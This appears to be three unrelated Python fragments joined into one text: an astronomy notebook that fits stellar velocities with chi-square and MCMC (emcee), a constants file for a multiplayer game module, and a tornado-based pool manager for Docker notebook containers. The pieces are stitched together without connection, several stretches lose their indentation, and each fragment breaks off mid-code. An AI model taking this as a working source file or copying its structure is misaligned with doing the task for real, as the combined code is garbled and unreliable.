            model = fit_continuum(shifted_wave, smoothed_templates[lsf], data['OPT_WAVE'][wmask], data['OPT_COUNTS'][wmask])
            # CALCULATE CHI2 AND APPEND
            c = calc_chi2(data['OPT_COUNTS'][wmask], model, data['OPT_COUNTS_IVAR'][wmask])
            chi2_vals.append(c)
            v_vals.append(v)
            lsf_vals.append(lsf)
    chi2_grid = np.array(chi2_vals)
    v_arr = np.array(v_vals)
    lsf_arr = np.array(lsf_vals)
    # PLOT CHI2 RESULTS
    fig, ax = plt.subplots(figsize=(8,5))
    idx_min = np.argmin(chi2_grid)
    # FIND ERROR: half-width of the delta-chi2 < 1 contour along velocity
    msk = chi2_grid < (np.min(chi2_grid) + 1.)
    v_err = (np.max(v_arr[msk]) - np.min(v_arr[msk]))/2.
    plt.scatter(v_arr,lsf_arr,c=chi2_grid,marker='o',s=35, vmin=chi2_grid[idx_min],vmax =chi2_grid[idx_min]+1000)
    # Do not shadow the builtin `str` for the plot title.
    title = 'Q7, STAR ID: {} Velocity = {:0.1f} +/- {:0.2f} kms Line Width = {} pixels'.format(star_idx, v_arr[idx_min],v_err,lsf_arr[idx_min])
    plt.plot(v_arr[idx_min],lsf_arr[idx_min],'ro')
    plt.xlabel('Velocity (km/s)')
    plt.ylabel('Line Spread (pixels)')
    plt.title(title)
# ### Question 8: MCMC with to find velocity
# Repeat Question 7 but this time fitting with MCMC. We suggest writing a single function `make_model` which creates a single synthetic model spectrum given an input velocity and smoothing.
# Report your best fit velocity and errors.
#
# You can chose to fit 2 parameters (velocity and smoothing), or as a bonus all 4 parameters (velocity, smoothing and continuum fit values).
# In[130]:
import emcee
import corner
# In[131]:
# MCMC to find velocity only. Report your best fit velocity and errors.
# Plot full corner plots for all fitted parameters.
def mk_model(theta, data_wave, data_flux, data_ivar, syn_wave, syn_flux):
    '''
    Build a model spectrum from the synthetic template:
    Doppler-shift the template wavelengths, smooth the template flux,
    then scale it onto the data continuum.

    theta[0] is the velocity (km/s), theta[1] the smoothing (pixels).
    data_ivar is unused here but kept for a uniform call signature.
    '''
    c_kms = 2.997924e5
    # SHIFT SYNTHETIC WAVELENGTH
    doppler_wave = syn_wave * (1 + theta[0] / c_kms)
    # SMOOTH TEMPLATE
    smoothed_flux = smooth_spectrum(syn_flux, theta[1])
    # MATCH CONTINUUM
    return fit_continuum(doppler_wave, smoothed_flux, data_wave, data_flux)
# In[132]:
def lnprob(theta, data_wave, data_flux, data_ivar, syn_wave, syn_flux):
    '''
    Log-posterior for emcee: prior plus likelihood, or -inf when the
    parameters fall outside the prior support.
    '''
    prior = lnprior(theta)
    if np.isfinite(prior):
        return prior + lnlike(theta, data_wave, data_flux, data_ivar, syn_wave, syn_flux)
    return -np.inf
def lnprior(theta):
    '''
    Flat (uninformative) prior on the fitted parameters.

    Parameters
    ----------
    theta : sequence of float
        theta[0] is the velocity in km/s, theta[1] the line spread in pixels.

    Returns
    -------
    float
        0.0 inside the allowed box, -inf outside.
    '''
    # Chained comparisons with `and` instead of bitwise `&` on booleans.
    if -500 < theta[0] < 500 and 1 < theta[1] < 50:
        return 0.0
    return -np.inf
def lnlike(theta, data_wave, data_flux, data_ivar, syn_wave, syn_flux):
    '''
    Evaluate the Gaussian log-likelihood of the data given the parameters.

    Parameters
    ----------
    theta : float array
        Current values of the fitted parameters (velocity, smoothing).
    data_wave, data_flux, data_ivar : float arrays
        Observed wavelengths, counts, and inverse variances.
    syn_wave, syn_flux : float arrays
        Synthetic template wavelengths and fluxes.

    Returns
    -------
    float
        Log-likelihood value, -0.5 * chi^2.
    '''
    # MAKE MODEL
    model = mk_model(theta, data_wave, data_flux, data_ivar, syn_wave, syn_flux)
    # EVALUATE LIKELIHOOD
    weighted_sq_resid = data_ivar * (data_flux - model)**2
    return -0.5 * np.sum(weighted_sq_resid)
def initialize_walkers(vguess, lguess):
    '''
    Initialize emcee walker starting positions around an initial guess.

    Parameters
    ----------
    vguess, lguess : float
        Initial guesses for velocity (km/s) and line spread (pixels).

    Returns
    -------
    ndim : int
        Number of free parameters (2).
    nwalkers : int
        Number of walkers (20).
    p0 : list of ndarray
        One (ndim,) start position per walker: the guess plus a tiny
        Gaussian perturbation so walkers do not start degenerate.
    '''
    # Two free parameters (velocity, line spread) and 20 walkers.
    ndim, nwalkers = 2, 20
    # The original version also built a uniform-random p0 here and then
    # immediately overwrote it below; that dead code has been removed.
    p0 = [np.array([vguess, lguess]) + 1e-4 * np.random.randn(ndim)
          for i in range(nwalkers)]
    return ndim, nwalkers, p0
# In[133]:
def plot_mcmc(sampler, burnin, ndim):
    '''
    Plot emcee sample chains for both parameters and make a corner plot.

    Parameters
    ----------
    sampler : emcee.EnsembleSampler
        A sampler that has already been run.
    burnin : int
        Number of leading samples to discard when building the corner plot.
    ndim : int
        Number of fitted parameters (expects 2: velocity, line spread).
    '''
    fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(20, 5))
    # Use the actual walker count rather than a hard-coded 20, so this also
    # works if initialize_walkers is ever changed.
    nwalkers = sampler.chain.shape[0]
    for ii in range(nwalkers):
        ax1.plot(sampler.chain[ii, :, 0], color="k", linewidth=0.5)
    for ii in range(nwalkers):
        ax2.plot(sampler.chain[ii, :, 1], color="k", linewidth=0.5)
    ax1.set_ylabel('Velocity (km/s)')
    ax2.set_ylabel('Line Width (pixels)')
    ax1.set_xlabel('Step Number')
    ax2.set_xlabel('Step Number')
    ax1.set_title('Velocity (V) Sample chains')
    ax2.set_title('Smoothing (LSF) Sample chains')
    ax1.axvline(burnin, label='Burn-in')
    ax2.axvline(burnin)
    ax1.legend()
    # PLOT CORNER: flatten (nwalkers, nsteps-burnin, ndim) -> (N, ndim)
    labels = ['v', 'lsf']
    samples = sampler.chain[:, burnin:, :].reshape((-1, ndim))
    fig = corner.corner(samples, labels=labels, show_titles=True, quantiles=[0.16, 0.5, 0.84])
# In[134]:
def plot_best_fit(best_v, best_lsf, data_wave, data_flux, data_ivar, starid):
    '''
    Overplot the best-fitting model spectrum on the science spectrum.
    '''
    template_file_name = 'dmost_lte_5000_3.0_-2.0_.fits'
    syn_wave, syn_flux = read_synthetic_spectrum(template_file_name)
    best_model = mk_model([best_v, best_lsf], data_wave, data_flux, data_ivar,
                          syn_wave, syn_flux)
    fig, ax = plt.subplots(figsize=(15, 4))
    ax.plot(data_wave, data_flux, label='Science')
    ax.plot(data_wave, best_model, label='Best Fit Model')
    ax.set_xlabel('Wavelength (Ang)')
    ax.set_ylabel('Flux')
    ax.set_xlim(8300, 8700)
    ax.set_title('Star ID: {}'.format(starid))
    plt.legend()
# In[135]:
def run_mcmc(starid, vguess, lguess, hdu, max_n = 1000):
    '''
    Set up and run an emcee fit of (velocity, line spread) for one star.

    Parameters
    ----------
    starid : int
        FITS extension of the star's spectrum in `hdu`.
    vguess, lguess : float
        Initial guesses for velocity (km/s) and line spread (pixels).
    hdu : HDUList
        Open multi-extension FITS file with the science spectra.
    max_n : int
        Number of MCMC steps to run per walker.

    Prints the burn-in length, a convergence flag, and the best-fit
    velocity, then plots the best-fit model and the sample chains.
    '''
    # Select the science spectrum in the Ca II triplet window.
    data = hdu[starid].data
    data_wave = data['OPT_WAVE']
    wmask = (data_wave > 8300) & (data_wave < 8700)
    data_wave = data_wave[wmask]
    data_flux = data['OPT_COUNTS'][wmask]
    data_ivar = data['OPT_COUNTS_IVAR'][wmask]
    template_file_name = 'dmost_lte_5000_3.0_-2.0_.fits'
    syn_wave, syn_flux = read_synthetic_spectrum(template_file_name)
    ndim, nwalkers, p0 = initialize_walkers(vguess,lguess)
    # INITIALIZE SAMPLER
    sampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, args=(data_wave, data_flux, data_ivar, syn_wave, syn_flux))
    # RUN MCMC
    pos, prob, state = sampler.run_mcmc(p0, max_n)
    # CALCULATE NUMBER OF BURNIN SAMPLES
    # tol=0 forces an estimate even when the chain is shorter than ~50*tau.
    tau = sampler.get_autocorr_time(tol=0)
    burnin = int(2 * np.max(tau))
    print('Number of burnin samples: ',burnin)
    # CHECK IF THINGS CONVERGED
    # Rule of thumb: chain should be at least ~100 autocorrelation times long.
    converged = np.all(tau * 100 < sampler.iteration)
    print('Did chains converge [0/1:]? ', np.sum(converged))
    # CALCULATE BEST VALUES
    best_v = np.mean(sampler.chain[:,burnin:,0])
    best_lsf = np.mean(sampler.chain[:,burnin:,1])
    # Half the 16th-84th percentile spread as a one-sigma-like error.
    best_v_err = (np.percentile(sampler.chain[:,burnin:,0],84) - np.percentile(sampler.chain[:,burnin:,0],16))/2.
    print('Best velocity: {:0.2f} +/- {:0.2f} km/s'.format(best_v,best_v_err))
    # PLOT STUFF
    plot_best_fit(best_v,best_lsf,data_wave,data_flux,data_ivar, starid)
    plot_mcmc(sampler, burnin, ndim)
# In[136]:
# Per-star initial guesses; emcee results are sensitive to these (see note below).
star_ids = [121, 135, 157]
v_guess = [-400,-405,-50]
lsf_guess = [13,9,15]
# In[137]:
# Star 1
i=0
run_mcmc(star_ids[i], v_guess[i], lsf_guess[i], hdu, max_n = 2000)
# In[138]:
# Star 2
i = 1
run_mcmc(star_ids[i], v_guess[i], lsf_guess[i], hdu, max_n = 2000)
# The MCMC results for Star 2 don't look very good. This seems to be very sensitive to input values. Many of you were able to get better looking results!
# In[139]:
# Star 3
i = 2
run_mcmc(star_ids[i], v_guess[i], lsf_guess[i], hdu, max_n = 2000)
# ```{note}
# In the context of MCMC, you'll often hear people talk about "marginalization". This is a classic example. Marginalization is the process of fitting for parameters we care about, plus "nuisance parameters" that we don't (like the smoothing and continuum values), and then "marginalizing out" the nuisance parameters by taking the 1D posterior spread only of the parameter of interest.
# ```
# ### Question 9: MCMC convergence
# Confirm that your MCMC above converged and that you are discarding the appropriate number of samples when determining your parameters (that is the burnin number).
#
# > With 2000 samples, my code did not formally converge yet still provides reliable best fit values. However, the error on these values are less well determined. If I were to publish this work, I would run more samples to ensure the errors are correct.
# ### Question 10: Science
#
# And finally, some science questions:
# 1. Do velocities agree between chi2 and mcmc within error?
# > The velocities agree very well between these methods.
#
# 2. Are the velocity errors the same?
# > The errors for chi2 tend to be smaller.
#
# 3. Are these three stars part of NGC 7006?
# > The velocity of NGC 7006 is -384 km/s. Stars 1 and 2 are definitely members of NGC 7006. Star 3 is a foreground star, most likely associated with the Milky Way's disk.
#
# ### Bonus: Organizing the spectra/reduction above using OOP
# Here's two classes that do everything above fairly neatly, with an example of their use.
# In[ ]:
class Spectrum():
    '''
    One science spectrum read from an extension of a multi-extension FITS
    file, truncated to the wavelength window [wl_min, wl_max].

    Attributes
    ----------
    wave, flux, unc : ndarray
        Wavelength, counts, and one-sigma uncertainty (converted from the
        stored inverse variance).
    '''

    def __init__(self, file, extension, wl_min=8300, wl_max=8800):
        # Bug fix: remember the filename. load_and_truncate previously read a
        # bare name `file` that was never defined in its scope (NameError).
        self.file = file
        self.ext = extension
        self.wl_min = wl_min
        self.wl_max = wl_max
        self.wave, self.flux, self.unc = self.load_and_truncate(self.ext, wl_min=wl_min, wl_max=wl_max)

    def load_and_truncate(self, extension, wl_min, wl_max):
        '''Read one extension and return (wave, flux, unc) with wl_min < wave < wl_max.'''
        with fits.open(self.file) as hdu:
            d = hdu[extension].data
            m, = np.where((d['OPT_WAVE'] > wl_min) & (d['OPT_WAVE'] < wl_max))
            flux = d['OPT_COUNTS'][m]
            wave = d['OPT_WAVE'][m]
            # Convert inverse variance to a one-sigma uncertainty.
            unc = np.sqrt(1. / d['OPT_COUNTS_IVAR'][m])
        return wave, flux, unc

    def plot(self, other=None):
        '''Plot the spectrum with its uncertainty band.

        `other` may be an object with .wave/.flux attributes or an (x, y)
        tuple; it is overplotted in a second color. Returns (fig, ax).'''
        fig, ax = plt.subplots(figsize=(40, 5))
        ax.fill_between(self.wave, self.flux - self.unc, self.flux + self.unc, color='gray', alpha=0.2)
        ax.plot(self.wave, self.flux, color='k')
        # `is not None` instead of `!= None` (identity check is the idiom).
        if other is not None:
            if hasattr(other, 'wave'):
                ax.plot(other.wave, other.flux, color='C1')
            else:
                # assume tuple x,y
                ax.plot(other[0], other[1], color='C1')
        ax.set_xlim(self.wl_min, self.wl_max)
        ax.set_xticks(np.arange(self.wl_min, self.wl_max, 25))
        ax.tick_params(direction='in', top=True, right=True, length=10, labelsize=14)
        ax.set_ylabel('Flux', fontsize=15)
        ax.set_xlabel('wavelength', fontsize=15)
        return fig, ax

    def chi_squared(self, flux):
        '''Return (chi2, red_chi2) of a model `flux` against this spectrum.

        NOTE(review): chi2 carries a 0.5 factor (so it is really -ln L), and
        red_chi2 divides by len+2 rather than the usual n - n_params; both
        are kept as-is to preserve existing results.'''
        chi2 = 0.5 * np.sum((self.flux - flux)**2 / self.unc**2)
        red_chi2 = chi2 / (len(self.flux) + 2)
        return chi2, red_chi2
class FitSynthetic():
    def __init__(self,fname):
        '''Load a synthetic template spectrum (flux + log-lambda wavelengths) from a FITS file.'''
        with fits.open(fname) as hdu:
            data = hdu[1].data
            self.flux = np.array(data['flux']).flatten()
            # Wavelengths are stored as ln(lambda); exponentiate to get Angstroms.
            awave = np.exp((data['wave']).flatten())
        # CONVERTING AIR WAVELENGTHS TO VACUUM
        # NOTE(review): looks like a standard air->vacuum index-of-refraction
        # fit (VALD/Piskunov-style coefficients) -- confirm against reference.
        s = 10**4 / awave
        n = 1. + 0.00008336624212083 + (0.02408926869968 / (130.1065924522 - s**2)) + (0.0001599740894897 / (38.92568793293 - s**2))
        self.wave = awave*n
    def add_spectrum(self,spec):
        '''Attach the observed Spectrum instance this template will be fit against.'''
        self.spec = spec
def match_continuum(self,plot=False):
synth_interp = np.interp(self.spec.wave,self.wave,self.flux)
response_fn = synth_interp / self.spec.flux
fit_response = iterative_polyfit(self.spec.wave,response_fn,1)
fit_vals = np.polyval(fit_response,self.wave)
if plot:
fig,ax=plt.subplots(figsize=(40,5))
ax.plot(self.spec.wave,response_fn)
ax.plot(self.wave,fit_vals)
ax.set_xlim(8300,8800)
self.matched_flux = self.flux / fit_vals
def get_model(self,velocity,sigma=25):
'''
Shift, | |
= 1000
poll_vote_no = 0
poll_vote_yes = 1
poll_vote_admin_no = 2
poll_vote_admin_yes = 3
poll_vote_abstain = 4
poll_result_no = -1
poll_result_yes = -2
poll_result_admin_no = -3
poll_result_admin_yes = -4
poll_result_existing = -5
poll_result_invalid = -6
poll_result_color = 0xFF0000
slot_faction_relations_begin = 30
faction_cost_change_banner = 500
faction_cost_change_name = 500
faction_cost_kick_player = 500
faction_cost_outlaw_player = 1000
########################################################
## SCENE SLOTS #############################
########################################################
########################################################
## TROOP SLOTS #############################
########################################################
troop_slot_count_per_equipment_type = 5
slot_troop_equipment_one_hand_begin = 0
slot_troop_equipment_two_hand_begin = 1 * troop_slot_count_per_equipment_type
slot_troop_equipment_ranged_begin = 2 * troop_slot_count_per_equipment_type
slot_troop_equipment_ammo_begin = 3 * troop_slot_count_per_equipment_type
slot_troop_equipment_shield_begin = 4 * troop_slot_count_per_equipment_type
slot_troop_equipment_head_begin = 5 * troop_slot_count_per_equipment_type
slot_troop_equipment_body_begin = 6 * troop_slot_count_per_equipment_type
slot_troop_equipment_foot_begin = 7 * troop_slot_count_per_equipment_type
slot_troop_equipment_hand_begin = 8 * troop_slot_count_per_equipment_type
slot_troop_equipment_horse_begin = 9 * troop_slot_count_per_equipment_type
slot_troop_ranking = 50 # used for sorting troop types in the player stats chart
slot_troop_spawn_health_percent = 51 # respawn health percentage when dying as this troop
slot_troop_class = 52
slot_troop_class_type = 53
slot_troop_rank = 54
slot_troop_rank_type = 55
slot_troop_can_use_cannon = 56
slot_troop_can_play_musics = 57
slot_player_array_size = 0
slot_player_array_begin = 1
player_array_unique_id = 0
player_array_troop_id = 1
player_array_faction_id = 2
player_array_gold_value = 3
player_array_outlaw_rating = 4
player_array_entry_size = 5 # number of values stored in the disconnected players array
max_castle_count = 8
slot_mission_data_castle_owner_faction_begin = 0 # owner factions of all castles
slot_mission_data_castle_owner_faction_end = 8
slot_mission_data_castle_is_active_begin = 10 # flags of which castles are active, with at least 1 capture point
slot_mission_data_castle_is_active_end = 18
slot_mission_data_castle_name_string_begin = 20 # string ids for castle names
slot_mission_data_castle_name_string_end = 28
slot_mission_data_castle_money_chest_begin = 30 # instance ids of the main money chest linked to each castle
slot_mission_data_castle_money_chest_end = 38
slot_mission_data_castle_allows_training_begin = 40 # flags of which active castles have at least one linked training station
slot_mission_data_castle_allows_training_end = 48
slot_mission_data_faction_to_change_name_of = 100 # store the faction id for the next faction name change message
slot_last_chat_message_event_type = 0 # for the last chat message sent: network event number, combined with a type from the list below starting with chat_event_type_
slot_last_chat_message_not_recieved = 1 # mark that the server has not notified of receiving the last chat message
chat_event_type_local = 0 # for each chat type, holding shift while pressing enter will add 1 to the type
chat_event_type_local_shout = 1
chat_event_type_set_faction_name = 2
chat_event_type_faction = 4
chat_event_type_faction_announce = 5
chat_event_type_admin = 6
chat_event_type_admin_announce = 7
slot_chat_overlay_local_color = 0
slot_chat_overlay_faction_color = 1
slot_ship_array_count = 0 # count of ship instance ids in the scene
slot_ship_array_begin = 1 # array of ship instance ids
slot_ship_array_collision_props_count = 100 # stored instance ids of scene props near water level, for checking collision with ships
slot_ship_array_collision_props_begin = 101
slot_array_count = 0
slot_array_begin = 1
########################################################
## TEAM SLOTS #############################
########################################################
########################################################
spawn_invulnerable_time = 10 # time agents are invlunerable after freshly spawning
loop_player_check_outlaw_interval = 60
loop_agent_check_interval = 2
loop_horse_check_interval = 30
loop_health_check_interval = 29
loop_weather_adjust_interval = 32
stock_count_check_interval = 5 # don't request stock count updates of the scene prop aimed at more often than this
repeat_action_min_interval = 5 # prevent players from repeating certain potentially expensive actions more often than this
carcass_search_min_interval = 5 # only search for a different animal carcass to process after this interval from the last
poll_time_duration = 60
name_server_kick_delay_interval = 5 # delay before kicking from the server to allow the rejection message to be received
def sq(distance):
    '''Square a distance at the engine's fixed-point scale.'''
    # get_sq_distance_between_positions always uses fixed point multiplier 100
    squared = distance * distance
    return squared / 100
max_distance_to_play_sound = 10000
max_distance_to_see_labels = 1500
max_distance_horse_rider = 5000
max_distance_local_chat = 3000
max_distance_local_chat_shout = 5000
ambient_distance_local_chat = 1000
ambient_distance_local_chat_shout = 2000
max_distance_local_animation = 2500
z_position_to_hide_object = -4999 # lower values might cause the position to "wrap around" up into the sky
z_position_water_level = -30 # approximate visible water level based on tests
max_distance_to_use = 300
max_distance_to_loot = 100
max_distance_admin_cart = 2000 # allow admins in their armor to attach carts from greater distances
max_distance_to_catch_fish = 2000
fish_school_max_move_distance = 500
fish_school_min_move_distance = 200
fish_school_minimum_depth = 200 # minimum water depth that a fish school will move into
fish_spawn_time = 300 # time before pruning fish items spawned
max_distance_to_include_in_herd = 5000 # when searching for a herd for an animal
castle_tax_gold_percentage = 20 # percentage of item price subtracted for selling price and added to the linked castle chest when bought
castle_training_gold_percentage = 50 # percentage of training cost added to the linked castle chest
craft_price_gold_reward_percentage = 20 # percentage of item price given to the crafter proportional to difference from target stock count
craft_skill_gold_reward_multiplier = 300 # multiplier of crafting skill required given to the crafter proportional to difference from target stock count
base_export_percentage = 100 # default percentage of item price for export stations
reduction_factor_base = 90
armor_damage_reduction_factor = 10
head_armor_speed_reduction_factor = 10
head_armor_accuracy_reduction_factor = 50
head_armor_reload_reduction_factor = 20
body_armor_speed_reduction_factor = 20
body_armor_accuracy_reduction_factor = 30
body_armor_reload_reduction_factor = 10
foot_armor_speed_reduction_factor = 30
foot_armor_accuracy_reduction_factor = 5
foot_armor_reload_reduction_factor = 5
hand_armor_speed_reduction_factor = 5
hand_armor_accuracy_reduction_factor = 30
hand_armor_reload_reduction_factor = 10
melee_damage_reduction_factor = 25
melee_speed_reduction_factor = 5
crossbow_damage_reduction_factor = 15
crossbow_speed_reduction_factor = 5
crossbow_accuracy_reduction_factor = 30
crossbow_reload_reduction_factor = 30
bow_thrown_damage_reduction_factor = 30
bow_thrown_speed_reduction_factor = 5
bow_thrown_accuracy_reduction_factor = 20
melee_max_level_difference = 3 # max strength difference to be able to swing a melee weapon
crossbow_max_level_difference = 4 # max strength difference to be able to shoot a crossbow
bow_ranged_max_level_difference = 3 # max power draw or power throw difference to be able to shoot a bow or throw a weapon
winch_type_drawbridge = 0
winch_type_portcullis = 1
winch_type_platform = 2
winch_type_sliding_door = 3
repairable_hit = 0
repairable_destroyed = 1
repairable_hit_destroyed = 2
repairable_repairing = 3
repairable_resource_required = 4
repairable_repaired = 5
ship_station_not_on_ship = 0
ship_station_none = 1
ship_station_mast = 2
ship_station_rudder = 3
ship_forwards_maximum = 9 # maximum forwards speed - also limited by ship type and agent skill
ship_rotation_maximum = 5 # maximum turning speed
ship_forwards_multiplier = 100
ship_rotation_multiplier = 3
player_list_item_height = 20
escape_menu_item_height = 35
admin_panel_item_height = 40
action_menu_item_height = 23
faction_menu_item_height = 120
animation_menu_item_height = 32
chat_overlay_item_height = 17
chat_overlay_ring_buffer_begin = "trp_chat_overlay_ring_buffer_0"
chat_overlay_ring_buffer_end = "trp_chat_overlay_ring_buffer_end"
chat_overlay_ring_buffer_size = 11
local_chat_color = 0xFFFFDD8A
local_chat_shout_color = 0xFFFF8C27
local_animation_color = 0xFFFFBBAA
admin_chat_color = 0xFFFF00FF
invalid_faction_color = 0xFF888888
outlaw_rating_for_kill = 2
outlaw_rating_for_team_kill = 5
outlaw_rating_for_lord_outlawed = 4
outlaw_rating_outlawed = 15 # outlaw players when they get this rating
outlaw_rating_maximum = 30 # don't add increase the rating more than this
change_faction_type_respawn = 0 # changing faction when training
change_faction_type_no_respawn = 1 # changing faction by clicking the use control, to the same troop type or one that allows it
change_faction_type_outlawed = 2 # being forced to change when outlawed, without respawning
capture_point_type_primary = 0 # after the required secondary points are captured, take over the castle
capture_point_type_secondary_all = 1 # require taking all secondary capture points of this type
capture_point_type_secondary_one = 2 # require taking at least one secondary capture point of this type
redraw_all_banners = 0 # at mission start on the server
redraw_castle_banners = 1 # when a castle is captured
redraw_faction_banners = 2 # when a faction lord changes their banner
redraw_client_banner_positions = 3 # at mission start on a client, to work around engine quirks with spawned items
redraw_single_capture_point_banner = 4 # when a secondary point is captured
inventory_slots_per_row = 6
inventory_slot_spacing = 100
inventory_mesh_offset = 50
inventory_container_x_offset = 190
inventory_container_y_offset = 175
scene_prop_hit_points_bar_scale_x = 6230
scene_prop_hit_points_bar_scale_y = 15000
select_agent_max_x = 300
select_agent_max_y = 200
presentation_max_x = 1000 # at fixed point multiplier 1000
presentation_max_y = 750 # at fixed point multiplier 1000
animation_menu_end_offset = 11
max_scene_prop_instance_id = 10000 # when trying to loop over all props in a scene, stop at this limit
max_food_amount = 100
max_hit_points_percent = 200
all_items_begin = "itm_tattered_headcloth"
all_items_end = "itm_all_items_end"
all_pn_items_begin = "itm_flag_france_45e"
all_pn_items_end = "itm_admin_musket"
wielded_items_begin = "itm_club"
wielded_items_end = "itm_all_items_end"
scripted_items_begin = "itm_surgeon_scalpel" # items outside this range are not checked from the ti_on_agent_hit trigger
scripted_items_end = "itm_money_bag"
herd_animal_items_begin = "itm_deer" # item range used for herd animal spawners
herd_animal_items_end = "itm_stick"
playable_troops_begin = "trp_peasant" # troops outside this range are treated as storage objects unusable by players
playable_troops_end = "trp_playable_troops_end"
factions_begin = "fac_commoners"
castle_factions_begin = "fac_1"
factions_end = "fac_factions_end"
castle_names_begin = "str_castle_name_0"
castle_names_end = "str_castle_names_end"
scenes_begin = "scn_scene_1"
scenes_end = "scn_scenes_end"
scene_names_begin = "str_scene_name_1" # this range of strings must correspond to the available scene slots
scene_names_end = "str_scene_names_end"
game_type_mission_templates_begin = "mt_conquest"
game_type_mission_templates_end = "mt_edit_scene"
game_type_names_begin = "str_game_type_1"
game_type_names_end = "str_game_types_end"
game_type_info_strings_begin = "str_game_type_1_info"
banner_meshes_begin = "mesh_banner_a01"
banner_meshes_end = "mesh_banners_default_a"
banner_items_begin = "itm_pw_banner_pole_a01" # range of items associated with banner mesh ids
banner_items_end = "itm_admin_horse"
commands_module_system_names_begin = "str_bot_count" # range of strings associated with hard coded server commands
commands_napoleonic_wars_names_begin = "str_use_class_limits"
admin_action_log_strings_begin = "str_log_admin_kick" # range of strings associated with admin actions, for the server log
ambient_sounds_begin = "snd_fire_loop" # for ambient sound emitter scene props
ambient_sounds_end = "snd_sounds_end"
action_menu_strings_begin = "str_toggle_name_labels" # range of strings associated with the action menu
action_menu_strings_end = "str_action_menu_end"
animation_strings_begin = "str_anim_cheer" # range of strings associated with the animation menu
animation_strings_end = "str_log_animation"
profile_option_strings_begin = "str_display_name_labels" # range of strings for options stored in a player profile
colour_white = 0
colour_red = 1
colour_green = 2
colour_blue = 3
colour_yellow = 4
colour_purple = 5
colour_pink = 6
colour_magenta = 7
colour_invisible = 8
drown_height_default = -192
drown_height_rider = -275
drown_height_crouched = -127
from header_common import *
profile_options = [ # global flag variables for options stored in a player profile
"$g_display_agent_labels",
"$g_hide_faction_in_name_labels",
"$g_display_chat_overlay",
"$g_chat_overlay_type_selected",
"$g_disable_automatic_shadow_recalculation",
"$g_animation_menu_no_mouse_grab",
"$g_mute_global_chat",
"$g_disable_rain_snow_particles",
]
if len(profile_options) >= profile_banner_id_option_bits_end - profile_banner_id_option_bits_begin:
raise Exception("Too many profile options: %d, maximum %d" % | |
import errno
import json
import os
import random
import string
import socket
from concurrent.futures import ThreadPoolExecutor
from collections import deque, namedtuple
from datetime import datetime, timedelta
from tornado import gen
from tornado import ioloop
from tornado.log import app_log
from tornado.httpclient import HTTPRequest, HTTPError, AsyncHTTPClient
from tornado.httputil import url_concat
import pytz
import re
import dockworker
# Use the curl-based implementation for all AsyncHTTPClient instances.
AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient")
import logging
# The curl client is chatty at DEBUG; cap its logger at INFO.
logging.getLogger("tornado.curl_httpclient").setLevel(logging.INFO)
# ISO-8601 UTC timestamp format with microseconds -- presumably the Docker
# API timestamp layout; confirm at the call sites that parse it.
_date_fmt = '%Y-%m-%dT%H:%M:%S.%fZ'
def sample_with_replacement(a, size):
    '''Return a string of `size` characters drawn uniformly with replacement
    from the sequence `a`, using a cryptographically secure RNG.

    If Python had sampling with replacement built in, we would use that; the
    other alternative is numpy.random.choice, but numpy is overkill for this
    tiny bit of random pathing.'''
    # Create the SystemRandom instance once, not once per character.
    rng = random.SystemRandom()
    return "".join(rng.choice(a) for _ in range(size))
def new_user(size):
    '''Generate a random alphanumeric user name of the given length.'''
    alphabet = string.ascii_letters + string.digits
    return sample_with_replacement(alphabet, size)
class PooledContainer(object):
    '''One preallocated notebook container: its Docker id, proxy path, and auth token.'''
    def __init__(self, id, path, token=''):
        # `id` mirrors Docker's field name (it shadows the builtin).
        self.id = id
        self.path = path
        self.token = token

    def __repr__(self):
        # Token is omitted from the repr, which keeps it out of log lines.
        return 'PooledContainer(id=%s, path=%s)' % (self.id, self.path)
class EmptyPoolError(Exception):
    '''Raised when a container is requested but the pool has none available.'''
class SpawnPool():
'''Manage a pool of precreated Docker containers.'''
def __init__(self,
proxy_endpoint,
proxy_token,
spawner,
container_config,
capacity,
max_idle,
max_age,
pool_name,
user_length,
static_files=None,
static_dump_path=os.path.join(os.path.dirname(__file__),
"static")):
'''Create a new, empty spawn pool, with nothing preallocated.'''
self.spawner = spawner
self.container_config = container_config
self.capacity = capacity
self.max_idle = max_idle
self.max_age = max_age
self.pool_name = pool_name
self.container_name_pattern = re.compile('tmp\.([^.]+)\.(.+)\Z')
self.proxy_endpoint = proxy_endpoint
self.proxy_token = proxy_token
self.user_length = user_length
self.available = deque()
self.started = {}
self.static_files = static_files
self.static_dump_path = static_dump_path
self._heart_beating = False
def acquire(self):
'''Acquire a preallocated container and returns its user path.
An EmptyPoolError is raised if no containers are ready.'''
if not self.available:
raise EmptyPoolError()
container = self.available.pop()
# signal start on acquisition
self.started[container.id] = datetime.utcnow()
return container
@gen.coroutine
def adhoc(self, user):
'''Launch a container with a fixed path by taking the place of an existing container from
the pool.'''
to_release = self.acquire()
app_log.debug("Discarding container [%s] to create an ad-hoc replacement.", to_release)
yield self.release(to_release, False)
launched = yield self._launch_container(user=user, enpool=False)
self.started[launched.id] = datetime.utcnow()
raise gen.Return(launched)
@gen.coroutine
def release(self, container, replace_if_room=True):
'''Shut down a container and delete its proxy entry.
Destroy the container in an orderly fashion. If requested and capacity is remaining, create
a new one to take its place.'''
try:
app_log.info("Releasing container [%s].", container)
self.started.pop(container.id, None)
yield [
self.spawner.shutdown_notebook_server(container.id),
self._proxy_remove(container.path)
]
app_log.debug("Container [%s] has been released.", container)
except Exception as e:
app_log.error("Unable to release container [%s]: %s", container, e)
return
if replace_if_room:
running = yield self.spawner.list_notebook_servers(self.container_name_pattern, all=False)
if len(running) + 1 <= self.capacity:
app_log.debug("Launching a replacement container.")
yield self._launch_container()
else:
app_log.info("Declining to launch a new container because [%i] containers are" +
" already running, and the capacity is [%i].",
len(running), self.capacity)
@gen.coroutine
def cleanout(self):
'''Completely cleanout containers that are part of this pool.'''
app_log.info("Performing initial pool cleanup")
containers = yield self.spawner.list_notebook_servers(self.container_name_pattern, all=True)
for container in containers:
try:
app_log.debug("Clearing old container [%s] from pool", container['Id'])
yield self.spawner.shutdown_notebook_server(container['Id'])
except Exception as e:
app_log.warn(e)
@gen.coroutine
def drain(self):
'''
Completely cleanout all available containers in the pool and immediately
schedule their replacement. Useful for refilling the pool with a new
container image while leaving in-use containers untouched. Returns the
number of containers drained.
'''
app_log.info("Draining available containers from pool")
tasks = []
while 1:
try:
pooled = self.acquire()
app_log.debug("Releasing container [%s] to drain the pool.", pooled.id)
tasks.append(self.release(pooled, replace_if_room=False))
except EmptyPoolError:
